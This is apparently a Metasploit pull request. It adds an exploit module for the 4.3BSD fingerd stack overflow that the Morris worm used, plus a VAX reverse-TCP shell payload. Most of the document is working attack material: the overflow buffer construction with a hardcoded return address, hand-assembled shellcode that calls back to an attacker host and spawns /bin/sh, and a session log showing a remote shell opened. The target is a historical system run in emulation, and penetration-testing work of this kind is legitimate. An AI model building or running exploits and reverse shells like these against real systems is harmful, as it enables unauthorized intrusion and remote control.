### PR TITLE
Add Morris worm fingerd exploit and VAX reverse shell

### DIFF
--- a/documentation/modules/exploit/bsd/finger/morris_fingerd_bof.md
+++ b/documentation/modules/exploit/bsd/finger/morris_fingerd_bof.md
@@ -1,0 +1,77 @@
+## Intro
+
+This module exploits a stack buffer overflow in `fingerd` on 4.3BSD.
+This vulnerability was exploited by the Morris worm in 1988-11-02.
+Cliff Stoll reports on the worm in the epilogue of *The Cuckoo's Egg*.
+
+## Setup
+
+For manual setup, please follow the Computer History Wiki's
+[guide](http://gunkies.org/wiki/Installing_4.3_BSD_on_SIMH) or Allen
+Garvin's [guide](http://plover.net/~agarvin/4.3bsd-on-simh.html) if
+you're using [Quasijarus](http://gunkies.org/wiki/4.3_BSD_Quasijarus).
+
+A Docker environment will be provided and referenced in this document.
+
+## Targets
+
+```
+Id  Name
+--  ----
+0   @(#)fingerd.c   5.1 (Berkeley) 6/6/85
+```
+
+## Options
+
+**RPORT**
+
+Set this to the target port. The default is 79 for `fingerd`, but the
+port may be forwarded when NAT (SLiRP) is used in SIMH.
+
+**PAYLOAD**
+
+Set this to a BSD VAX payload. Currently only
+`bsd/vax/shell_reverse_tcp` is supported.
+
+## Usage
+
+```
+msf5 exploit(bsd/finger/morris_fingerd_bof) > options
+
+Module options (exploit/bsd/finger/morris_fingerd_bof):
+
+   Name    Current Setting  Required  Description
+   ----    ---------------  --------  -----------
+   RHOSTS  127.0.0.1        yes       The target address range or CIDR identifier
+   RPORT   79               yes       The target port (TCP)
+
+
+Payload options (bsd/vax/shell_reverse_tcp):
+
+   Name   Current Setting  Required  Description
+   ----   ---------------  --------  -----------
+   LHOST  192.168.1.2      yes       The listen address (an interface may be specified)
+   LPORT  4444             yes       The listen port
+
+
+Exploit target:
+
+   Id  Name
+   --  ----
+   0   @(#)fingerd.c   5.1 (Berkeley) 6/6/85
+
+
+msf5 exploit(bsd/finger/morris_fingerd_bof) > run
+
+[*] Started reverse TCP handler on 192.168.1.2:4444
+[*] 127.0.0.1:79 - Connecting to fingerd
+[*] 127.0.0.1:79 - Sending 533-byte buffer
+[*] Command shell session 1 opened (192.168.1.2:4444 -> 192.168.1.2:51992) at 2018-09-25 10:14:15 -0500
+
+whoami
+nobody
+cat /etc/motd
+4.3 BSD UNIX #1: Fri Jun  6 19:55:29 PDT 1986
+
+Would you like to play a game?
+```

--- a/documentation/modules/exploit/bsd/finger/morris_fingerd_bof.md
+++ b/documentation/modules/exploit/bsd/finger/morris_fingerd_bof.md
@@ -6,12 +6,13 @@ Cliff Stoll reports on the worm in the epilogue of *The Cuckoo's Egg*.
 
 ## Setup
 
+A Docker environment for 4.3BSD on VAX is available at
+<https://github.com/wvu/ye-olde-bsd>.
+
 For manual setup, please follow the Computer History Wiki's
 [guide](http://gunkies.org/wiki/Installing_4.3_BSD_on_SIMH) or Allen
 Garvin's [guide](http://plover.net/~agarvin/4.3bsd-on-simh.html) if
 you're using [Quasijarus](http://gunkies.org/wiki/4.3_BSD_Quasijarus).
-
-A Docker environment will be provided and referenced in this document.
 
 ## Targets
 

--- a/modules/exploits/bsd/finger/morris_fingerd_bof.rb
+++ b/modules/exploits/bsd/finger/morris_fingerd_bof.rb
@@ -1,0 +1,81 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+class MetasploitModule < Msf::Exploit::Remote
+
+  Rank = NormalRanking
+
+  # This is so one-off that we define it here
+  ARCH_VAX = 'vax'
+
+  include Msf::Exploit::Remote::Tcp
+
+  def initialize(info = {})
+    super(update_info(info,
+      'Name'           => 'Morris Worm fingerd Stack Buffer Overflow',
+      'Description'    => %q{
+        This module exploits a stack buffer overflow in fingerd on 4.3BSD.
+        This vulnerability was exploited by the Morris worm in 1988-11-02.
+        Cliff Stoll reports on the worm in the epilogue of The Cuckoo's Egg.
+      },
+      'Author'         => [
+        'Robert Tappan Morris', # Discovery? Exploit and worm for sure
+        'Cliff Stoll',          # The Cuckoo's Egg epilogue and inspiration
+        'wvu'                   # Module, payload, and additional research
+      ],
+      'References'     => [
+        ['URL', 'https://en.wikipedia.org/wiki/Morris_worm'],         # History
+        ['URL', 'https://spaf.cerias.purdue.edu/tech-reps/823.pdf'],  # Analysis
+        ['URL', 'http://computerarcheology.com/Virus/MorrisWorm/'],   # Details
+        ['URL', 'https://github.com/arialdomartini/morris-worm'],     # Source
+        ['URL', 'http://gunkies.org/wiki/Installing_4.3_BSD_on_SIMH'] # Setup
+        # And credit to the innumerable VAX ISA docs on the Web
+      ],
+      'DisclosureDate' => 'Nov 2 1988',
+      'License'        => MSF_LICENSE,
+      'Platform'       => 'bsd',
+      'Arch'           => ARCH_VAX,
+      'Privileged'     => false, # Depends on inetd.conf, usually "nobody"
+      'Targets'        => [
+        # https://en.wikipedia.org/wiki/Source_Code_Control_System
+        ['@(#)fingerd.c   5.1 (Berkeley) 6/6/85', 'Ret' => 0x7fffe9b0]
+      ],
+      'DefaultTarget'  => 0,
+      'DefaultOptions' => {'PAYLOAD' => 'bsd/vax/shell_reverse_tcp'}
+    ))
+
+    register_options([Opt::RPORT(79)])
+  end
+
+  def exploit
+    # 0x01 is NOP in VAX-speak
+    nops = "\x01" * 300
+
+    # This overwrites part of the buffer
+    junk = Rex::Text.rand_text_alphanumeric(109)
+
+    # This zeroes out part of the stack frame
+    frame = "\x00" * 16
+
+    # Finally, pack in our return address
+    ret  = [target.ret].pack('V') # V is for VAX!
+
+    # The newline is for gets(3)
+    sploit = nops + payload.encoded + junk + frame + ret + "\n"
+
+    # Fire away
+    print_status('Connecting to fingerd')
+    connect
+    print_status("Sending #{sploit.length}-byte buffer")
+    sock.put(sploit)
+
+  # Hat tip @bcoles
+  rescue Rex::ConnectionError => e
+    fail_with(Failure::Unreachable, e.message)
+  ensure
+    disconnect
+  end
+
+end

--- a/modules/exploits/bsd/finger/morris_fingerd_bof.rb
+++ b/modules/exploits/bsd/finger/morris_fingerd_bof.rb
@@ -14,18 +14,18 @@ class MetasploitModule < Msf::Exploit::Remote
 
   def initialize(info = {})
     super(update_info(info,
-      'Name'           => 'Morris Worm fingerd Stack Buffer Overflow',
-      'Description'    => %q{
+      'Name'              => 'Morris Worm fingerd Stack Buffer Overflow',
+      'Description'       => %q{
         This module exploits a stack buffer overflow in fingerd on 4.3BSD.
         This vulnerability was exploited by the Morris worm in 1988-11-02.
         Cliff Stoll reports on the worm in the epilogue of The Cuckoo's Egg.
       },
-      'Author'         => [
+      'Author'            => [
         'Robert Tappan Morris', # Discovery? Exploit and worm for sure
         'Cliff Stoll',          # The Cuckoo's Egg epilogue and inspiration
         'wvu'                   # Module, payload, and additional research
       ],
-      'References'     => [
+      'References'        => [
         ['URL', 'https://en.wikipedia.org/wiki/Morris_worm'],         # History
         ['URL', 'https://spaf.cerias.purdue.edu/tech-reps/823.pdf'],  # Analysis
         ['URL', 'http://computerarcheology.com/Virus/MorrisWorm/'],   # Details
@@ -33,28 +33,39 @@ class MetasploitModule < Msf::Exploit::Remote
         ['URL', 'http://gunkies.org/wiki/Installing_4.3_BSD_on_SIMH'] # Setup
         # And credit to the innumerable VAX ISA docs on the Web
       ],
-      'DisclosureDate' => 'Nov 2 1988',
-      'License'        => MSF_LICENSE,
-      'Platform'       => 'bsd',
-      'Arch'           => ARCH_VAX,
-      'Privileged'     => false, # Depends on inetd.conf, usually "nobody"
-      'Targets'        => [
+      'DisclosureDate'    => 'Nov 2 1988',
+      'License'           => MSF_LICENSE,
+      'Platform'          => 'bsd',
+      'Arch'              => ARCH_VAX,
+      'Privileged'        => false, # Depends on inetd.conf, usually "nobody"
+      'Targets'           => [
         # https://en.wikipedia.org/wiki/Source_Code_Control_System
-        ['@(#)fingerd.c   5.1 (Berkeley) 6/6/85', 'Ret' => 0x7fffe9b0]
+        ['@(#)fingerd.c   5.1 (Berkeley) 6/6/85',
+          'Ret'           => 0x7fffe9b0,
+          'Payload'       => {
+            'Space'       => 403,
+            'BadChars'    => "\n",
+            'Encoder'     => 'generic/none', # There is no spoon
+            'DisableNops' => true            # Hardcoded NOPs
+          }
+        ]
       ],
-      'DefaultTarget'  => 0,
-      'DefaultOptions' => {'PAYLOAD' => 'bsd/vax/shell_reverse_tcp'}
+      'DefaultTarget'     => 0,
+      'DefaultOptions'    => {'PAYLOAD' => 'bsd/vax/shell_reverse_tcp'}
     ))
 
     register_options([Opt::RPORT(79)])
   end
 
   def exploit
+    # Start by generating our custom VAX shellcode
+    shellcode = payload.encoded
+
     # 0x01 is NOP in VAX-speak
-    nops = "\x01" * 300
+    nops = "\x01" * (target.payload_space - shellcode.length)
 
     # This overwrites part of the buffer
-    junk = Rex::Text.rand_text_alphanumeric(109)
+    junk = rand_text_alphanumeric(109)
 
     # This zeroes out part of the stack frame
     frame = "\x00" * 16
@@ -63,7 +74,7 @@ class MetasploitModule < Msf::Exploit::Remote
     ret  = [target.ret].pack('V') # V is for VAX!
 
     # The newline is for gets(3)
-    sploit = nops + payload.encoded + junk + frame + ret + "\n"
+    sploit = nops + shellcode + junk + frame + ret + "\n"
 
     # Fire away
     print_status('Connecting to fingerd')

--- a/modules/exploits/bsd/finger/morris_fingerd_bof.rb
+++ b/modules/exploits/bsd/finger/morris_fingerd_bof.rb
@@ -57,6 +57,27 @@ class MetasploitModule < Msf::Exploit::Remote
     register_options([Opt::RPORT(79)])
   end
 
+  def check
+    token = rand_text_alphanumeric(8..42)
+
+    connect
+    sock.put("#{token}\n")
+    res = sock.get_once
+
+    return CheckCode::Unknown unless res
+
+    if res.include?("Login name: #{token}")
+      return CheckCode::Detected
+    end
+
+    CheckCode::Safe
+  rescue Rex::ConnectionError => e
+    vprint_error(e.message)
+    CheckCode::Unknown
+  ensure
+    disconnect
+  end
+
   def exploit
     # Start by generating our custom VAX shellcode
     shellcode = payload.encoded

--- a/modules/payloads/singles/bsd/vax/shell_reverse_tcp.rb
+++ b/modules/payloads/singles/bsd/vax/shell_reverse_tcp.rb
@@ -1,0 +1,72 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+module MetasploitModule
+
+  CachedSize = 103
+
+  # This is so one-off that we define it here
+  ARCH_VAX = 'vax'
+
+  include Msf::Payload::Single
+  include Msf::Sessions::CommandShellOptions
+
+  def initialize(info = {})
+    super(merge_info(info,
+      'Name'        => 'BSD Command Shell, Reverse TCP Inline',
+      'Description' => 'Connect back to attacker and spawn a command shell',
+      'Author'      => 'wvu',
+      'License'     => MSF_LICENSE,
+      'Platform'    => 'bsd',
+      'Arch'        => ARCH_VAX,
+      'Handler'     => Msf::Handler::ReverseTcp,
+      'Session'     => Msf::Sessions::CommandShellUnix,
+      'Payload'     => {
+        'Offsets'   => {
+          'LHOST'   => [24, 'ADDR'],
+          'LPORT'   => [32, 'n']
+        },
+        'Payload'   =>
+          "\xdd\x00" +                 # pushl $0
+          "\xdd\x01" +                 # pushl $1
+          "\xdd\x02" +                 # pushl $2
+          "\xdd\x03" +                 # pushl $3
+          "\xd0\x5e\x5c" +             # movl  sp,ap
+          "\xbc\x8f\x61\x00" +         # chmk  $61
+          "\xd0\x50\x5a" +             # movl  r0,r10
+          "\xdd\x00" +                 # pushl $0
+          "\xdd\x00" +                 # pushl $0
+          "\xdd\x8f\x00\x00\x00\x00" + # pushl LHOST
+          "\xdd\x8f\x02\x00\x00\x00" + # pushl AF_INET + LPORT
+          "\xd0\x5e\x5b" +             # movl  sp,r11
+          "\xdd\x10" +                 # pushl $10
+          "\xdd\x5b" +                 # pushl r11
+          "\xdd\x5a" +                 # pushl r10
+          "\xdd\x03" +                 # pushl $3
+          "\xd0\x5e\x5c" +             # movl  sp,ap
+          "\xbc\x8f\x62\x00" +         # chmk  $62
+          "\xd0\x00\x5b" +             # movl  $0,r11
+          "\xdd\x5b" +                 # pushl r11
+          "\xdd\x5a" +                 # pushl r10
+          "\xdd\x02" +                 # pushl $2
+          "\xd0\x5e\x5c" +             # movl  sp,ap
+          "\xbc\x8f\x5a\x00" +         # chmk  $5a
+          "\xd6\x5b" +                 # incl  r11
+          "\xd1\x5b\x02" +             # cmpl  r11,$2
+          "\x15\xec" +                 # bleq  dup2
+          "\xdd\x8f\x2f\x73\x68\x00" + # pushl $68732f
+          "\xdd\x8f\x2f\x62\x69\x6e" + # pushl $6e69622f
+          "\xd0\x5e\x5b" +             # movl  sp,r11
+          "\xdd\x00" +                 # pushl $0
+          "\xdd\x00" +                 # pushl $0
+          "\xdd\x5b" +                 # pushl r11
+          "\xdd\x03"  +                # pushl $3
+          "\xd0\x5e\x5c" +             # movl  sp,ap
+          "\xbc\x3b"                   # chmk  $3b
+      }
+    ))
+  end
+
+end

--- a/modules/payloads/singles/bsd/vax/shell_reverse_tcp.rb
+++ b/modules/payloads/singles/bsd/vax/shell_reverse_tcp.rb
@@ -5,7 +5,7 @@
 
 module MetasploitModule
 
-  CachedSize = 103
+  CachedSize = 100
 
   # This is so one-off that we define it here
   ARCH_VAX = 'vax'
@@ -29,42 +29,40 @@ module MetasploitModule
           'LPORT'   => [32, 'n']
         },
         'Payload'   =>
-          "\xdd\x00" +                 # pushl $0
-          "\xdd\x01" +                 # pushl $1
-          "\xdd\x02" +                 # pushl $2
-          "\xdd\x03" +                 # pushl $3
-          "\xd0\x5e\x5c" +             # movl  sp,ap
-          "\xbc\x8f\x61\x00" +         # chmk  $61
-          "\xd0\x50\x5a" +             # movl  r0,r10
-          "\xdd\x00" +                 # pushl $0
-          "\xdd\x00" +                 # pushl $0
-          "\xdd\x8f\x00\x00\x00\x00" + # pushl LHOST
-          "\xdd\x8f\x02\x00\x00\x00" + # pushl AF_INET + LPORT
-          "\xd0\x5e\x5b" +             # movl  sp,r11
-          "\xdd\x10" +                 # pushl $10
-          "\xdd\x5b" +                 # pushl r11
-          "\xdd\x5a" +                 # pushl r10
-          "\xdd\x03" +                 # pushl $3
-          "\xd0\x5e\x5c" +             # movl  sp,ap
-          "\xbc\x8f\x62\x00" +         # chmk  $62
-          "\xd0\x00\x5b" +             # movl  $0,r11
-          "\xdd\x5b" +                 # pushl r11
-          "\xdd\x5a" +                 # pushl r10
-          "\xdd\x02" +                 # pushl $2
-          "\xd0\x5e\x5c" +             # movl  sp,ap
-          "\xbc\x8f\x5a\x00" +         # chmk  $5a
-          "\xd6\x5b" +                 # incl  r11
-          "\xd1\x5b\x02" +             # cmpl  r11,$2
-          "\x15\xec" +                 # bleq  dup2
-          "\xdd\x8f\x2f\x73\x68\x00" + # pushl $68732f
-          "\xdd\x8f\x2f\x62\x69\x6e" + # pushl $6e69622f
-          "\xd0\x5e\x5b" +             # movl  sp,r11
-          "\xdd\x00" +                 # pushl $0
-          "\xdd\x00" +                 # pushl $0
-          "\xdd\x5b" +                 # pushl r11
-          "\xdd\x03"  +                # pushl $3
-          "\xd0\x5e\x5c" +             # movl  sp,ap
-          "\xbc\x3b"                   # chmk  $3b
+          "\xdd\x00" +                 # pushl  $0
+          "\xdd\x01" +                 # pushl  $1
+          "\xdd\x02" +                 # pushl  $2
+          "\xdd\x03" +                 # pushl  $3
+          "\xd0\x5e\x5c" +             # movl   sp,ap
+          "\xbc\x8f\x61\x00" +         # chmk   $61
+          "\xd0\x50\x5a" +             # movl   r0,r10
+          "\xdd\x00" +                 # pushl  $0
+          "\xdd\x00" +                 # pushl  $0
+          "\xdd\x8f\x00\x00\x00\x00" + # pushl  LHOST
+          "\xdd\x8f\x02\x00\x00\x00" + # pushl  AF_INET + LPORT
+          "\xd0\x5e\x5b" +             # movl   sp,r11
+          "\xdd\x10" +                 # pushl  $10
+          "\xdd\x5b" +                 # pushl  r11
+          "\xdd\x5a" +                 # pushl  r10
+          "\xdd\x03" +                 # pushl  $3
+          "\xd0\x5e\x5c" +             # movl   sp,ap
+          "\xbc\x8f\x62\x00" +         # chmk   $62
+          "\xd0\x00\x5b" +             # movl   $0,r11
+          "\xdd\x5b" +                 # pushl  r11
+          "\xdd\x5a" +                 # pushl  r10
+          "\xdd\x02" +                 # pushl  $2
+          "\xd0\x5e\x5c" +             # movl   sp,ap
+          "\xbc\x8f\x5a\x00" +         # chmk   $5a
+          "\xf3\x02\x5b\xef" +         # aobleq $2,r11,dup2
+          "\xdd\x8f\x2f\x73\x68\x00" + # pushl  $68732f
+          "\xdd\x8f\x2f\x62\x69\x6e" + # pushl  $6e69622f
+          "\xd0\x5e\x5b" +             # movl   sp,r11
+          "\xdd\x00" +                 # pushl  $0
+          "\xdd\x00" +                 # pushl  $0
+          "\xdd\x5b" +                 # pushl  r11
+          "\xdd\x03"  +                # pushl  $3
+          "\xd0\x5e\x5c" +             # movl   sp,ap
+          "\xbc\x3b"                   # chmk   $3b
       }
     ))
   end


### PR DESCRIPTION
```
msf5 exploit(bsd/finger/morris_fingerd_bof) > options

Module options (exploit/bsd/finger/morris_fingerd_bof):

   Name    Current Setting  Required  Description
   ----    ---------------  --------  -----------
   RHOSTS  127.0.0.1        yes       The target address range or CIDR identifier
   RPORT   79               yes       The target port (TCP)


Payload options (bsd/vax/shell_reverse_tcp):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST  192.168.1.2      yes       The listen address (an interface may be specified)
   LPORT  4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   @(#)fingerd.c   5.1 (Berkeley) 6/6/85


msf5 exploit(bsd/finger/morris_fingerd_bof) > run

[*] Started reverse TCP handler on 192.168.1.2:4444
[*] 127.0.0.1:79 - Connecting to fingerd
[*] 127.0.0.1:79 - Sending 533-byte buffer
[*] Command shell session 1 opened (192.168.1.2:4444 -> 192.168.1.2:51992) at 2018-09-25 10:14:15 -0500

whoami
nobody
cat /etc/motd
4.3 BSD UNIX #1: Fri Jun  6 19:55:29 PDT 1986

Would you like to play a game?
```